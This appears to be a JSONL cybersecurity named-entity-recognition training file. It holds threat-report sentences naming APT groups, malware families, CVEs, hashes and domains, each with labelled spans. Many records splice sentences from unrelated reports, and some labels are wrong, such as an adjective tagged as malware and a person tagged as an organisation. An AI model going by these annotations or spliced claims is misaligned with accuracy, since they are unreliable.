Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"MALWARE: Bread": [[81, 86]], "ORGANIZATION: Middle Eastern human rights activist": [[211, 247]], "ORGANIZATION: Astamirov": [[361, 370]]}, "info": {"id": "cyberner_stix_train_003488", "source": "cyberner_stix_train"}} {"text": "To trick the targeted individual into enabling macros , the attackers deliberately used jumbled-up text as content .", "spans": {}, "info": {"id": "cyberner_stix_train_003489", "source": "cyberner_stix_train"}} {"text": "and was identified within an archive file ( 4FE7561F63A71CA73C26CB95B28EAEE8 ) with the name “ التفاصيل الكاملة لأغتيال فقهاء.r24 ” .", "spans": {"FILEPATH: 4FE7561F63A71CA73C26CB95B28EAEE8": [[44, 76]], "FILEPATH: التفاصيل الكاملة لأغتيال فقهاء.r24": [[95, 129]]}, "info": {"id": "cyberner_stix_train_003490", "source": "cyberner_stix_train"}} {"text": "The incident represented a shift in the capabilities and consequences of ICS malware .", "spans": {"TOOL: ICS": [[73, 76]]}, "info": {"id": "cyberner_stix_train_003491", "source": "cyberner_stix_train"}} {"text": "Next it writes a hardcoded binary from its body to “ msdeltemp.dll ” into the target directory .", "spans": {"FILEPATH: msdeltemp.dll": [[53, 66]]}, "info": {"id": "cyberner_stix_train_003492", "source": "cyberner_stix_train"}} {"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . 
Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"VULNERABILITY: vulnerability": [[19, 32]], "THREAT_ACTOR: Shadow Brokers": [[211, 225]], "ORGANIZATION: Iranian women 's activist": [[315, 340]], "ORGANIZATION: individual": [[346, 356]]}, "info": {"id": "cyberner_stix_train_003493", "source": "cyberner_stix_train"}} {"text": "Ukrainian officials revealed that the investigation into the compromise of the CEC ’s internal network identified malware traced to APT28 .", "spans": {"ORGANIZATION: CEC": [[79, 82]], "THREAT_ACTOR: APT28": [[132, 137]]}, "info": {"id": "cyberner_stix_train_003494", "source": "cyberner_stix_train"}} {"text": "nis : The su application used to execute shell commands with root privileges . PLATINUM has used several zero-day exploits against their victims . Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit MAL ( HTRAN ) – to disguise their geographical locations .", "spans": {"THREAT_ACTOR: PLATINUM": [[79, 87]], "VULNERABILITY: zero-day exploits": [[105, 122]], "THREAT_ACTOR: Moafee": [[147, 153]], "THREAT_ACTOR: DragonOK": [[158, 166]], "MALWARE: HUC Packet Transmit MAL": [[202, 225]], "MALWARE: HTRAN": [[228, 233]]}, "info": {"id": "cyberner_stix_train_003495", "source": "cyberner_stix_train"}} {"text": "This research identified several bouts of offensive activity that occurred in the past few months , which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network .", "spans": {}, "info": {"id": "cyberner_stix_train_003496", "source": "cyberner_stix_train"}} {"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine . 
Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . phpschboy.prohosts.org .", "spans": {"MALWARE: regsvr32.exe": [[126, 138]], "THREAT_ACTOR: APT19": [[183, 188]], "ORGANIZATION: law firms": [[220, 229]], "DOMAIN: phpschboy.prohosts.org": [[232, 254]]}, "info": {"id": "cyberner_stix_train_003497", "source": "cyberner_stix_train"}} {"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[54, 68]]}, "info": {"id": "cyberner_stix_train_003498", "source": "cyberner_stix_train"}} {"text": "There are known related samples that are able to create such directories on removable drives , i.e . the sample with md5: 8cb08140ddb00ac373d29d37657a03cc .", "spans": {"FILEPATH: 8cb08140ddb00ac373d29d37657a03cc": [[122, 154]]}, "info": {"id": "cyberner_stix_train_003499", "source": "cyberner_stix_train"}} {"text": "Please follow these basic precautions during the current crisis—and at all times : Install apps only from official stores , such as Google Play . We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum . It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": {"SYSTEM: Google Play": [[132, 143]], "THREAT_ACTOR: Ke3chang": [[303, 311]], "TOOL: backdoor": [[322, 330]], "TOOL: Okrum": [[340, 345]]}, "info": {"id": "cyberner_stix_train_003500", "source": "cyberner_stix_train"}} {"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . 
In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"VULNERABILITY: CVE-2010-3962": [[14, 27]], "VULNERABILITY: CVE-2014-1776": [[70, 83]], "THREAT_ACTOR: Bahamut": [[156, 163]]}, "info": {"id": "cyberner_stix_train_003501", "source": "cyberner_stix_train"}} {"text": "It is also another example for why organizations and consumers alike should have an advanced mobile threat prevention solution installed on the device to protect themselves against the possibility of unknowingly installing malicious apps , even from trusted app stores . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . The group goes further in its social engineering effort : to convince the hotel personnel about the legitimacy of their request , a copy of the National Registry of Legal Entities card ( CNPJ ) is attached to the quotation . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": {"TOOL: Corkow": [[296, 302]], "ORGANIZATION: Apple": [[643, 648]], "SYSTEM: iOS": [[672, 675]], "SYSTEM: iPadOS": [[678, 684]], "SYSTEM: macOS": [[689, 694]]}, "info": {"id": "cyberner_stix_train_003502", "source": "cyberner_stix_train"}} {"text": "During the course of our research , we noticed that we were not the only ones to have found the operation . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 . As a rule , the initial dropper is created by the infection procedure . 
Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"THREAT_ACTOR: Fxmsp": [[108, 113]], "TOOL: NetSupport RAT": [[353, 367]]}, "info": {"id": "cyberner_stix_train_003503", "source": "cyberner_stix_train"}} {"text": "With further analysis of the Quasar RAT C2 Server , we uncovered vulnerabilities in the server code , which would allow remote code execution .", "spans": {"MALWARE: Quasar RAT": [[29, 39]], "TOOL: C2": [[40, 42]]}, "info": {"id": "cyberner_stix_train_003504", "source": "cyberner_stix_train"}} {"text": "TABLE OF CONTENTS Security Recommendations Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . 
The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": {"MALWARE: EventBot": [[194, 202]], "ORGANIZATION: MITRE": [[272, 277]], "MALWARE: thanks.pps": [[452, 462]], "MALWARE: ins8376.exe": [[526, 537]], "MALWARE: mpro324.dll": [[570, 581]], "THREAT_ACTOR: Spring Dragon": [[588, 601]], "ORGANIZATION: government-related organizations": [[662, 694]]}, "info": {"id": "cyberner_stix_train_003505", "source": "cyberner_stix_train"}} {"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users . A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools . This file was likely delivered via a spear-phishing email . We have previously observed targeting in countries including Germany , Denmark , Sweden , France , Poland , Slovakia , Ukraine , Israel , the United Arab Emirates ( UAE ) , and other NATO ally and partner countries such as Japan .", "spans": {"MALWARE: virulent": [[35, 43]], "SYSTEM: Android": [[97, 104]], "SYSTEM: Google Play": [[169, 180]], "TOOL: KiloAlfa": [[301, 309]], "THREAT_ACTOR: Lazarus Group": [[349, 362]]}, "info": {"id": "cyberner_stix_train_003506", "source": "cyberner_stix_train"}} {"text": "Malicious module “ ip ” This file will be executed by the patched system library . Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . APT1 . 
If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": {"ORGANIZATION: Talos": [[83, 88]], "THREAT_ACTOR: APT1": [[356, 360]]}, "info": {"id": "cyberner_stix_train_003507", "source": "cyberner_stix_train"}} {"text": "q= - : As is common with trojans , the communication is always initiated by the trojan on the device to the C2 . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": {"THREAT_ACTOR: ITG08’s": [[223, 230]], "TOOL: PowerShell": [[238, 248]], "THREAT_ACTOR: APT38": [[281, 286]], "THREAT_ACTOR: cyber espionage operators": [[343, 368]], "ORGANIZATION: financial institutions": [[439, 461]]}, "info": {"id": "cyberner_stix_train_003508", "source": "cyberner_stix_train"}} {"text": "The RTF document 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff was very small in size at 264 bytes .", "spans": {"TOOL: RTF": [[4, 7]], "FILEPATH: 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff": [[17, 81]]}, "info": {"id": "cyberner_stix_train_003509", "source": "cyberner_stix_train"}} {"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . 
like this , The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show ’s producers at the Warner Bros. production company Wall to Wall Media .", "spans": {"SYSTEM: Facebook Messenger": [[38, 56]], "SYSTEM: WhatsApp": [[59, 67]], "SYSTEM: Skype": [[70, 75]], "SYSTEM: Viber": [[78, 83]], "SYSTEM: Line": [[86, 90]], "SYSTEM: WeChat": [[93, 99]], "SYSTEM: Hangouts": [[102, 110]], "SYSTEM: Telegram": [[113, 121]], "SYSTEM: BlackBerry Messenger": [[128, 148]], "ORGANIZATION: Symantec": [[151, 159]], "THREAT_ACTOR: BRONZE BUTLER": [[228, 241]], "ORGANIZATION: KrebsOnSecurity": [[424, 439]], "ORGANIZATION: Jeremy Bullock": [[444, 458]], "ORGANIZATION: Warner Bros.": [[523, 535]], "ORGANIZATION: Wall to Wall Media": [[555, 573]]}, "info": {"id": "cyberner_stix_train_003510", "source": "cyberner_stix_train"}} {"text": "Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive . Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address . It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool . 
ThreatConnect Can Help Protect Your Organization from Phishing and BEC Attacks", "spans": {"ORGANIZATION: ThreatConnect": [[475, 488]]}, "info": {"id": "cyberner_stix_train_003511", "source": "cyberner_stix_train"}} {"text": "Almost all of the strings and behaviors we describe in this analysis of a .NET version are also present in the native version .", "spans": {"TOOL: .NET": [[74, 78]]}, "info": {"id": "cyberner_stix_train_003512", "source": "cyberner_stix_train"}} {"text": "Trend Micro™ Mobile Security for Apple devices ( available on the App Store ) can monitor and block phishing attacks and other malicious URLs .", "spans": {"ORGANIZATION: Trend Micro™ Mobile Security": [[0, 28]], "TOOL: Apple devices": [[33, 46]], "TOOL: App Store": [[66, 75]], "URL: URLs": [[137, 141]]}, "info": {"id": "cyberner_stix_train_003513", "source": "cyberner_stix_train"}} {"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {"TOOL: BitPaymer IR engagements": [[10, 34]], "ORGANIZATION: Falcon Intelligence": [[37, 56]], "TOOL: FlashPlayer plugin": [[115, 133]], "TOOL: Chrome web browser": [[142, 160]]}, "info": {"id": "cyberner_stix_train_003514", "source": "cyberner_stix_train"}} {"text": "Design In the manifest , the malware requests a large number of permissions . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting . The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : “ ASUSTeK Computer Inc. ” ) . 
Each data item fills its location by calling function so , it will become like the following but with the victim collected data .", "spans": {"THREAT_ACTOR: APT10": [[78, 83]], "THREAT_ACTOR: threat actor": [[141, 153]]}, "info": {"id": "cyberner_stix_train_003515", "source": "cyberner_stix_train"}} {"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": {"TOOL: Samas": [[11, 16]], "TOOL: BitPaymer": [[21, 30]], "TOOL: Ryuk": [[33, 37]], "THREAT_ACTOR: Samurai Panda": [[95, 108]]}, "info": {"id": "cyberner_stix_train_003516", "source": "cyberner_stix_train"}} {"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . 
We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "ORGANIZATION: executives": [[188, 198]], "ORGANIZATION: industrial": [[262, 272]], "ORGANIZATION: engineering": [[275, 286]], "ORGANIZATION: manufacturing organizations": [[291, 318]]}, "info": {"id": "cyberner_stix_train_003517", "source": "cyberner_stix_train"}} {"text": "On April 20 , Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries .", "spans": {"ORGANIZATION: Proofpoint": [[14, 24]]}, "info": {"id": "cyberner_stix_train_003518", "source": "cyberner_stix_train"}} {"text": "Either of these tools could have been used to exfiltrate the archived data .", "spans": {}, "info": {"id": "cyberner_stix_train_003519", "source": "cyberner_stix_train"}} {"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": {"ORGANIZATION: Indian and Saudi Arabian government": [[117, 152]]}, "info": {"id": "cyberner_stix_train_003520", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "MALWARE: OwaAuth": [[33, 40]], "TOOL: web shell": [[41, 50]], "TOOL: Exchange": [[54, 62]], "TOOL: ISAPI filter": [[93, 105]]}, "info": {"id": "cyberner_stix_train_003521", "source": "cyberner_stix_train"}} {"text": "In this case , Yandex Browser , Chromium , 7Star Browser ( a Chromium-based browser ) , and CentBrowser are targeted , as well as versions of Microsoft Outlook from 1997 through 2016 .", "spans": {"TOOL: Yandex Browser": [[15, 29]], "TOOL: Chromium": [[32, 40]], "TOOL: 7Star Browser": [[43, 56]], "TOOL: 
Chromium-based browser": [[61, 83]], "TOOL: CentBrowser": [[92, 103]], "ORGANIZATION: Microsoft": [[142, 151]], "TOOL: Outlook": [[152, 159]]}, "info": {"id": "cyberner_stix_train_003522", "source": "cyberner_stix_train"}} {"text": "The group created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {}, "info": {"id": "cyberner_stix_train_003523", "source": "cyberner_stix_train"}} {"text": "NATO , Afghan Ministry of Foreign Affairs , Pakistani Military :", "spans": {"ORGANIZATION: NATO": [[0, 4]], "ORGANIZATION: Afghan Ministry of Foreign Affairs": [[7, 41]], "ORGANIZATION: Pakistani Military": [[44, 62]]}, "info": {"id": "cyberner_stix_train_003524", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //nttdocomo-qae [ . Several sources consider APT28 a group of CyberMercs based in Russia . Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"THREAT_ACTOR: APT28": [[58, 63]], "THREAT_ACTOR: group": [[66, 71]], "ORGANIZATION: Carbon Black TAU ThreatSight": [[104, 132]], "MALWARE: GandCrab": [[142, 150]], "MALWARE: Ursnif": [[155, 161]], "ORGANIZATION: Bullock": [[164, 171]], "THREAT_ACTOR: Ashley Madison hackers": [[250, 272]], "ORGANIZATION: Biderman": [[284, 292]]}, "info": {"id": "cyberner_stix_train_003525", "source": "cyberner_stix_train"}} {"text": "Removing the junk instructions revealed a readable block of code . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The decrypted MUI file contains position-independent code at offset 0 . 
This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"MALWARE: malicious Word documents": [[88, 112]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[141, 205]], "VULNERABILITY: CVE-2014-6332": [[217, 230]], "VULNERABILITY: server - side request forgery ( SSRF )": [[346, 384]]}, "info": {"id": "cyberner_stix_train_003526", "source": "cyberner_stix_train"}} {"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers . The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure . We judge that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {"ORGANIZATION: Symantec": [[586, 594]], "THREAT_ACTOR: Lazarus": [[621, 628]], "ORGANIZATION: customers": [[666, 675]]}, "info": {"id": "cyberner_stix_train_003527", "source": "cyberner_stix_train"}} {"text": "] cashnow [ . Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . 
By using the and instruction , As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"THREAT_ACTOR: Gorgon": [[14, 20]], "ORGANIZATION: CISA": [[199, 203]], "THREAT_ACTOR: LockBit": [[215, 222]]}, "info": {"id": "cyberner_stix_train_003528", "source": "cyberner_stix_train"}} {"text": "Release_Time : 2016-03-15 Report_URL : https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "spans": {}, "info": {"id": "cyberner_stix_train_003529", "source": "cyberner_stix_train"}} {"text": "The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server .", "spans": {"TOOL: ActionScript": [[88, 100]], "TOOL: C2": [[134, 136]]}, "info": {"id": "cyberner_stix_train_003530", "source": "cyberner_stix_train"}} {"text": "Just like we can’t make a definitive determination as to who conducted this campaign , we do not know for sure who it was intended to target .", "spans": {}, "info": {"id": "cyberner_stix_train_003531", "source": "cyberner_stix_train"}} {"text": "Just 7 days later , on the 26th of January , a component for CosmicDuke was compiled that exploited the vulnerability and allowed the tool to operate with higher privileges .", "spans": {"MALWARE: CosmicDuke": [[61, 71]]}, "info": {"id": "cyberner_stix_train_003532", "source": "cyberner_stix_train"}} {"text": "A month after observing sample 2 , we obtained another which used the same package name as sample 2 ( cn.android.setting ) . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . 
FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"THREAT_ACTOR: APT41's": [[186, 193]], "ORGANIZATION: video game industry": [[215, 234]], "THREAT_ACTOR: FANCY BEAR": [[360, 370]], "THREAT_ACTOR: Sofacy": [[387, 393]], "THREAT_ACTOR: APT28": [[397, 402]], "ORGANIZATION: Aerospace": [[558, 567]], "ORGANIZATION: Defense": [[570, 577]], "ORGANIZATION: Energy": [[580, 586]], "ORGANIZATION: Government": [[589, 599]], "ORGANIZATION: Media sectors": [[604, 617]]}, "info": {"id": "cyberner_stix_train_003533", "source": "cyberner_stix_train"}} {"text": "Based on the amount of open-source information available on the target , it is feasible that a spear-phishing email may have been used .", "spans": {"TOOL: email": [[110, 115]]}, "info": {"id": "cyberner_stix_train_003534", "source": "cyberner_stix_train"}} {"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . 
If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[439, 465]], "MALWARE: malicious files": [[513, 528]], "ORGANIZATION: government": [[594, 604]], "ORGANIZATION: MalwareBytes": [[629, 641]], "MALWARE: DoublePulsar backdoor": [[651, 672]], "MALWARE: SMB worm": [[699, 707]], "VULNERABILITY: Eternalblue": [[752, 763]], "TOOL: SMBv1": [[764, 769]], "VULNERABILITY: exploit": [[770, 777]]}, "info": {"id": "cyberner_stix_train_003535", "source": "cyberner_stix_train"}} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"ORGANIZATION: government officials": [[163, 183]], "THREAT_ACTOR: Patchwork": [[226, 235]], "VULNERABILITY: CVE-2017-0261": [[251, 264]], "VULNERABILITY: CVE-2015-2545": [[398, 411]]}, "info": {"id": "cyberner_stix_train_003536", "source": "cyberner_stix_train"}} {"text": "] 6 2020-02-29 http : //themoil [ . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . Charming kitten regularly target international media outlets with Persian-language services .", "spans": {"MALWARE: .NET malware": [[87, 99]], "MALWARE: Topinambour": [[120, 131]], "THREAT_ACTOR: Charming kitten": [[145, 160]], "ORGANIZATION: media": [[192, 197]]}, "info": {"id": "cyberner_stix_train_003537", "source": "cyberner_stix_train"}} {"text": "Extract logs from Facebook Messenger conversations . 
The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services . Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers . Malware detections do n’t matter nearly as much as malware damage — just one ransomware attack can close your business .", "spans": {"SYSTEM: Facebook Messenger": [[18, 36]], "ORGANIZATION: intelligence services": [[212, 233]], "ORGANIZATION: Cybereason": [[236, 246]], "MALWARE: backdoor": [[265, 273]]}, "info": {"id": "cyberner_stix_train_003538", "source": "cyberner_stix_train"}} {"text": "FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: TEMP.Veles": [[78, 88]]}, "info": {"id": "cyberner_stix_train_003539", "source": "cyberner_stix_train"}} {"text": "In addition , analysis of these backdoor delivery methods also highlights a trend by many threat actors where they use legitimate storage platforms to deliver the initial stages of the attack .", "spans": {}, "info": {"id": "cyberner_stix_train_003540", "source": "cyberner_stix_train"}} {"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . 
Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]], "ORGANIZATION: Dragos": [[342, 348]], "ORGANIZATION: ICS industry": [[394, 406]]}, "info": {"id": "cyberner_stix_train_003541", "source": "cyberner_stix_train"}} {"text": "Per a 2015 report from CitizenLab , Gamma Group licenses their software to clients and each client uses unique infrastructure , making it likely that the two documents are being used by a single client . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": {"ORGANIZATION: CitizenLab": [[23, 33]], "THREAT_ACTOR: Gamma Group": [[36, 47]], "ORGANIZATION: infrastructure": [[111, 125]], "ORGANIZATION: Proofpoint": [[274, 284]], "ORGANIZATION: embassies": [[403, 412]]}, "info": {"id": "cyberner_stix_train_003542", "source": "cyberner_stix_train"}} {"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"MALWARE: SWAnalytics": [[34, 45]], "TOOL: emails": [[241, 247]], "VULNERABILITY: exploit": [[290, 297]], "VULNERABILITY: CVE-2017-11882": [[306, 320]], "VULNERABILITY: vulnerability": [[321, 334]]}, "info": {"id": "cyberner_stix_train_003543", "source": "cyberner_stix_train"}} {"text": "This also aligns with HenBox ’ s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 . 
This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"MALWARE: HenBox": [[22, 28], [86, 92]], "ORGANIZATION: diplomats": [[155, 164]], "ORGANIZATION: journalists": [[261, 272]], "THREAT_ACTOR: attackers": [[279, 288]], "MALWARE: Poison Ivy RAT": [[306, 320]], "MALWARE: WinHTTPHelper": [[325, 338]], "MALWARE: malware": [[339, 346]], "ORGANIZATION: government officials": [[378, 398]]}, "info": {"id": "cyberner_stix_train_003544", "source": "cyberner_stix_train"}} {"text": "The dropper implements 2 persistence mechanisms :", "spans": {}, "info": {"id": "cyberner_stix_train_003545", "source": "cyberner_stix_train"}} {"text": "Based on the length of the Dukes ’ activity , our estimate of the amount of resources invested in the operation and the fact that their activity only appears to be increasing , we believe the group to have significant and most critically , stable financial backing .", "spans": {"THREAT_ACTOR: Dukes": [[27, 32]]}, "info": {"id": "cyberner_stix_train_003546", "source": "cyberner_stix_train"}} {"text": "Each version expands the bot ’ s functionality and works to obfuscate the malware against analysis . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years .", "spans": {"MALWARE: it's": [[104, 108]], "TOOL: Cyrillic": [[109, 117]], "TOOL: UTF-16": [[237, 243]]}, "info": {"id": "cyberner_stix_train_003547", "source": "cyberner_stix_train"}} {"text": "So we decided to write our own plugin code using IDA Python . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . 
This is probably done by the component that drops and installs this malicious service . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"SYSTEM: Python": [[53, 59]], "THREAT_ACTOR: threat actors": [[86, 99]], "ORGANIZATION: individual": [[134, 144]], "THREAT_ACTOR: Monti ransomware collective": [[281, 308]], "ORGANIZATION: legal and governmental fields": [[374, 403]]}, "info": {"id": "cyberner_stix_train_003548", "source": "cyberner_stix_train"}} {"text": "Cobalt Strike — This popular and commercially available penetration tool gains shell access to an infected system .", "spans": {"TOOL: Cobalt Strike": [[0, 13]]}, "info": {"id": "cyberner_stix_train_003549", "source": "cyberner_stix_train"}} {"text": "The payload is actually an HTML Application ( HTA ) file , not an RTF document .", "spans": {"TOOL: HTML": [[27, 31]], "TOOL: HTA": [[46, 49]], "TOOL: RTF": [[66, 69]]}, "info": {"id": "cyberner_stix_train_003550", "source": "cyberner_stix_train"}} {"text": "Then it sends all that information to the Command & Control server . Adobe Flash Player exploit . FireEye also reported on these attacks in a May 22 blog post .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[69, 95]], "ORGANIZATION: FireEye": [[98, 105]]}, "info": {"id": "cyberner_stix_train_003551", "source": "cyberner_stix_train"}} {"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . APT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses . 
